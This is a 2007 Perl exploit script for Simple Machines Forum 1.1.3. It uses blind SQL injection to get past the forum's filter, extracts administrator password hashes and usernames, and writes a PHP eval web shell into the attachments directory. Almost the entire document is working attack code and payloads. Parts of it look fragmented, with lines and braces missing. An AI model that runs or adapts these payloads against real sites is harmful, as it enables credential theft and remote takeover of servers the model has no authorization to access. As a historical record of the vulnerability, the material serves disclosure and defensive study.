Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection








#Written By Michael Brooks
#contact: th3(dot)r00k(at)gmail(dot)com

#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit!
#	-Binary Search
#	-Multi-Threaded
#	-NO benchmark()'s
#Two SQL Injection flaws.
#Works with magic_quotes_gpc=On or Off. 
#Total Bypass of SMF's SQL Injection filter.

#I submitted a patch for these flaws:

#I would like to thank RetroGod for being so skilled and willing to help me out. 

#**Warning** perl will somtimes seg fault when useing threads.
#Tested Under Linux

use LWP::UserAgent;
use threads;
use Thread::Semaphore;

	#global variables
	my $threads=1;
	my $semaphore = new Thread::Semaphore; 
	my $globPos : shared=1;
	my $oper : shared;
	my @result : shared;
	my $target;
	my $cookie=false;

	main();#execute main
	sub main{
		#Process arguments passed by the command line.
			if(substr($ARGV[$v],0,1) eq '-'){
			print "\nExample:\n";
			print "\nbrooks@TheLab:~/code/exploits\$ ./ -p  -u admin -t -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D 
\n\nSMF Is Vulnerable!
Finding Password Hash for the Name: 'admin'
Please Standby...

Password Hash:
This attack used 161 HTTP requests and took 8 seconds to complete.
		if($n != 1){
		#Check to make sure the target is vulnerable
			#Yes I am assuming the default table prefix,  its a shame you can't access information_schema.
			#No prefix is needed for the non-cookie attack becase I do not need a union select or sub-select!
			bin_finder(2,1,"1","smf_members","and 1!=1");
			bin_finder(2,1,"1","smf_members","and 1=1");
				print "SMF Is Vulnerable!\n"
				print "\nATTACK FAILED!\n\n";
					print "Try sending a private message to your self or SMF might be patched.\n"
					print "The non-cookie attack requires MySQL 5 so try using the exploit with -c or SMF might be patched.\n"

			if($user != 1){
				print "Finding Password Hash for the Name: '$user'\n Please Standby...\n";				
				for(my $x=0;$x<$threads;$x++){
					#@threads[$x]=new threads \&bin_finder,16,40,"(conv(SUBSTRING(passwd,%s,1),16,10))=%s", "smf_members"," and memberName = '".$user."'";
					@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and memberName =". hex_encode($user);
				for(my $x=0;$x<$threads;$x++){
				print "\nPassword Hash:\n";
				foreach $y (@result){
					print sprintf("%x",$y);
				print "Finding An Administrative Credental.\n Please Standby...\n";
				#bin_finder(128 ,1,"count(memberName)","smf_members"," and ID_GROUP=1 ");#single thread
				#print "There are $admin_count admins on this forum.\n";
					for(my $x=0;$x<$threads;$x++){
						@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and ID_MEMBER=1  ";
					for(my $x=0;$x<$threads;$x++){
					print "\nPassword Hash:\n";
					foreach $y (@result){
						print sprintf("%x",$y);
					bin_finder(256,1,"char_length(memberName)","smf_members"," and ID_MEMBER=1  ");#single thread
						@threads[$x]=new threads \&bin_finder,128,$name_len,"ASCII(SUBSTRING(memberName,%s,1))", "smf_members"," and ID_MEMBER=1  ";
					print "\nName:\n";
						print sprintf("%c",@result[$l]);
					print "\n";
				die("\nA cookie is needed for this attack!\n");
			print "Determining the exact path to place the backdoor. \n Please standby...\n";
			bin_finder(512,1,"char_length(value)","smf_settings"," and variable = 'attachmentUploadDir'");#single thread
			for(my $x=0;$x<$threads;$x++){
				@threads[$x]=new threads \&bin_finder,128,$length,"ASCII(SUBSTRING(value,%s,1))", "smf_settings"," and variable = 'attachmentUploadDir'";
			for(my $x=0;$x<$threads;$x++){
			print "Path Disclosed:";
			foreach $y (@result){
				$path.=sprintf("%c" ,$y);
			print $path."\n";
			#$path=~s/_/?/g;#This accounts for the search request being modfied by SMF.
			$r=rand();#Random file name so the attack will succeed multiple times against the same target. 
			my $ua = LWP::UserAgent->new;
			$ua->default_header("Cookie"=>$cookie);#Its tricky to get double quotes for the outfile statement.
			$load="\\,union select ".hex_encode("<?php eval(\$_GET[e]);?>").' into outfile  "","'.$path.'/'.$r.'.php",""#';		
			$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
			print "\nEval Backdoor:\n".$target."attachments/".$r.".php?e=phpinfo();\n"
			print "A Very Fast Blind Sql Injection Exploit for SMF 1.1.3.\n\n";
			print "-p		obtain passwords (if used without -u,  then an admin credential will be obtained)\n";
			print "-b		installs a backdoor using 'into outfile'. (requires -c)  **WARNING** SMF will log this as a single 'Hacking Attempt'!\n"; 
			print "-t 		target\n";
			print "-c		A valid cookie(Much faster attack)\n";
			print "\nAditional:\n";
			print "-u		obtains the password for a user name\n";
			print "-n		number of threads\n";
			print "-e		Shows an Example.\n";
			print "The password hash is generated as:\n";
			print "sha1(strtolower($username) . $password);\n\n";

			print "\nThis attack used $oper HTTP requests and took $t seconds to complete.";
			print "\nEOF\n";
	#Takes complex input to build the request,  returns a simple bool. 
	sub bin_ask{
		my $if = shift;
		my $table=shift;
		my $where = shift;
		my $ua = shift;
		my $f=0;
			#no union select or sub-select needed for this attack!
			#$where="and realName = ".hex_encode("admin");
			$load="\"\\\",\" or  (IF(".$if.",sleep(10),1) $where) limit 1,1 #\"";	
			$load=~s/_/?/g;#This accounts for the search request being modfied by SMF.
			$tst= $ua->post($target."?action=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"relevance%7Cdesc","brd%5B1%5D"=>1,"submit"=>"Search"]);
			$page= $tst->content;
			#print "<br>page:".$page;die;
			$t= time();
			#print "\n 1:time\n".$t."\n\n";
		}else{#%sunion select bypasses SMF's filter so i can use a sub-select in the following query.
			$load="\\,union select ".hex_encode("1)) or (1!=\"'\") and (select (IF((".$if."),true,false)) from ".$table." where 1 ".$where.") or (1!=\"'\") and pmr.ID_MEMBER = 1#'").' # ';#sql comments still work in SMF		
			$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
			$page= $tst->content;
			#print $page; die ;		
			if(index($page,"No Messages Found")==-1){
		return $f;

	#worker thread
	sub bin_finder{
		my $base=shift;
		my $length=shift;
		my $question=shift;
		my $table=shift;
		my $where=shift;
		#One UserAgent object is used per thread.
		my $ua = LWP::UserAgent->new;
		#binary search:
			my $n=$base-1;
			my $low=0;
			my $floor= $low;
			my $high=$n-1;
			my $pos= $low+(($high-low)/2);
			my $f=1;
					$great="GREATEST(".sprintf($question,$c).",".$pos.")!=".$pos;#bypass the filter for the < and > characters 
					 $less ="LEAST(".sprintf($question,$c).",".$pos.")!=".$pos;
				if(bin_ask($great, $table,$where,$ua)){#asking the sql database if the current value is greater than $pos
					if($pos==$n-1){#if this is true then the value must be the modulus. 
						#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
				}elsif(bin_ask($less, $table,$where,$ua)){#asking the sql database if the current value is less than $pos
					if($pos==$floor+1){#if this is true the value must be zero.
						#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
					#both greater than and less then where asked, so thats two http requests. 
					#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";,,
#hex_encode was ported from one of RetroGod's php exploits.
#Thanks be to rGod for telling me about this encoding method on milw0rm's forum back when it was still up.  
#rGot you are leet!  
sub hex_encode{
  my $my_string=shift;
  my $encoded="0x";
  my $len=length($my_string);
  for ($k=0; $k<$len; $k++){
	if (length($temp)==1) {
  return $encoded;

# [2007-10-20]